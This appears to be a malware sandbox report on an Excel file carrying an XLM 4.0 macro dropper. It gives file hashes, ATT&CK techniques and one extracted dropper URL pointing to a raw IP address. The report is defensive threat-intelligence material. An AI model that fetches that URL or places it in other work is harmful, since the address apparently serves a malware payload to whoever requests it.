Overview

overview

10

Static

static

8

document-1...97.xls

windows7_x64

10

document-1...97.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    doc (16).zip

  • Size

    15KB

  • Sample

    210224-v7r9p32xva

  • MD5

    435fd48b1d938717ae2bd3f7bbd45a69

  • SHA1

    72a1f3c743033304bccd11503914521ae5f6662b

  • SHA256

    b08dccba7b50a181160d47d504146388142a223d21bcfb84f9d26c2b964f374f

  • SHA512

    9ac96b6e43b1bef4e4eafcce5f95699fe58d0bd480fdd5ecb507d3ab334c46c3d85d96392c42c5cc3ac67c6451e1f44db0757f081bd82c23f899b1fcc548ef13

Score
10/10
macroxlm

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://45.11.183.181/22.gif

Targets

    • Target

      document-197066197.xls

    • Size

      90KB

    • MD5

      b1b373079e3ce83ccea85c2c6c50f10c

    • SHA1

      9917e63c334dd1d81182631a5776c922f797d2f3

    • SHA256

      edfb3775902364ce01d274c0203c78d849f2cfdd07e05bd165649288f7185e1c

    • SHA512

      31c9702a7825c27b38422543fe97ff41ffbdf1442b8b0cba62c61f28aac87428047a5efd6ca9ca5540d88c5dd5fdeff3e9cc7db12a8f34219216a0f484ce64cc

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks